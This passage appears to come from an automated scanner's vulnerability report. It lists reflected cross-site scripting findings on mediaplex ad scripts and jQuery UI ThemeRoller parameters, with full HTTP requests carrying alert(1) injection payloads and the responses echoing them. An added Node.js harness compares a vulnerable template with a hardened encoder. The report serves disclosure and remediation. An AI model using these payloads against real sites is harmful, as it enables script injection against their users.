Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:10 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("1e48d";alert(1)//72ddadbc4e8");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("1e48d";alert(1)//72ddadbc4e8");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("1e48d"%3balert(1)//72ddadbc4e8");
...[SNIP]...

3.44. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/131652/Lumension_IWL_728x90_A01.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84fd0'%3balert(1)//f2d6030a414 was submitted in the mpvc parameter. This input was echoed as 84fd0';alert(1)//f2d6030a414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=84fd0'%3balert(1)//f2d6030a414 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=16228:26209/1551:9866/16161:27909/15017:34236/5712:3840/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:57:16 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 19:28:52 GMT
ETag: "594d41-f7f-4a67a362d4500"
Accept-Ranges: bytes
Content-Length: 4303
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="84fd0';alert(1)//f2d6030a414http://altfarm.mediaplex.com/ad/ck/16228-131652-26209-0?mpt=7820111112" target="_blank">
...[SNIP]...
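The mpck and mpvc sinks in 3.37 to 3.44, and the "queryParams" string in 3.36, all write a request parameter straight into a JavaScript string literal. The following is an added example, not mediaplex or Microsoft code: a hypothetical Node.js reconstruction of the sink shape seen in the responses (the template, the variable names mpvclick and mpvc, and the function names jsStringLiteral, renderVulnerable, renderHardened, runGenerated and compare are this example's own assumptions) beside a hardened version that encodes for the string-literal context at write time. The report's own probes from 3.38 and 3.39 are run through both templates under a stubbed alert(), so the breakout, the syntax-error case and the round trip of the hardened value are all observable.

```javascript
'use strict';

// Encode an arbitrary string as a JavaScript string literal, quotes included.
// Every character outside [A-Za-z0-9] becomes \xHH or \uHHHH, so a quote,
// backslash, newline, U+2028/2029 or "</script>" in the value can never alter
// the surrounding script, whichever quote style the template happens to use.
function jsStringLiteral(value) {
  let out = '"';
  for (const ch of String(value)) {          // for...of iterates by code point
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else if (cp < 0x100) {
      out += '\\x' + cp.toString(16).padStart(2, '0');
    } else if (cp < 0x10000) {
      out += '\\u' + cp.toString(16).padStart(4, '0');
    } else {
      out += '\\u{' + cp.toString(16) + '}';
    }
  }
  return out + '"';
}

// Shape of the sink in the captured responses (hypothetical reconstruction,
// not mediaplex's template): the parameter is pasted between double quotes
// with no encoding at all, and encodeURIComponent only runs after parsing.
function renderVulnerable(mpvc) {
  return 'var mpvclick = encodeURIComponent("' + mpvc + '");\n' +
         'var mpvc = mpvclick;';
}

// Same template with the value encoded for the string-literal context at the
// point it is written into the script.
function renderHardened(mpvc) {
  return 'var mpvclick = encodeURIComponent(' + jsStringLiteral(mpvc) + ');\n' +
         'var mpvc = mpvclick;';
}

// Evaluate a generated script the way a browser would, with alert() stubbed so
// a breakout is observable. Returns { alerted, mpvc, error }; error holds the
// exception name when the script fails to parse or run.
function runGenerated(script) {
  let alerted = false;
  const alert = () => { alerted = true; };
  try {
    const fn = new Function('alert', script + '\nreturn mpvc;');
    const mpvc = fn(alert);
    return { alerted, mpvc, error: null };
  } catch (e) {
    return { alerted, mpvc: undefined, error: e.name };
  }
}

// Probes copied from the report: the subtraction form from 3.38 and the
// statement-terminating form from 3.39.
const PROBES = {
  subtraction: 'ba7d1"-alert(1)-"f80be01d7ee',
  statement: '27b45";alert(1)//46612244006',
};

// Run one probe through both templates.
function compare(probe) {
  return {
    vulnerable: runGenerated(renderVulnerable(probe)),
    hardened: runGenerated(renderHardened(probe)),
  };
}

for (const [name, probe] of Object.entries(PROBES)) {
  const r = compare(probe);
  console.log(name, 'vulnerable:', r.vulnerable, 'hardened:', r.hardened);
}
```

Running it shows the three outcomes side by side: the subtraction probe fires alert() in the vulnerable template, the statement probe produces a SyntaxError there (the caveat noted under 3.39 and 3.43), and the hardened template never calls alert() while mpvc still decodes back to exactly the submitted value. The encoder is deliberately quote-agnostic, which matters on this page because the same parameters land in both single-quoted and double-quoted literals.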

3.45. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2240d"><script>alert(1)</script>2089f77dadf was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a715"><script>alert(1)</script>09e95dd3a22 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 4055f"><script>alert(1)</script>0399770b2a2 submitted in the bgColorDefault parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 17242"><script>alert(1)</script>bafb8efe2b6 submitted in the bgColorError parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 10edc"><script>alert(1)</script>d067a1b35af submitted in the bgColorHeader parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value. The response snippet below shows where it lands: the href of the <link rel="stylesheet"> element that loads /themeroller/css/parseTheme.css.php with the full theme query string, which is why the same sink recurs for each theme parameter in this report.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 84d7e"><script>alert(1)</script>7a510e251a9 submitted in the bgColorHighlight parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied unencoded into a double-quoted HTML attribute value. The payload 1e8c7"><script>alert(1)</script>04593ff0f74 submitted in the bgColorHover parameter was echoed unmodified in the application's response: the leading "> closes the attribute and its tag, so the <script> element that follows is parsed as markup rather than as part of the attribute value.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and will run in the page's origin for any user who loads the crafted URL.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

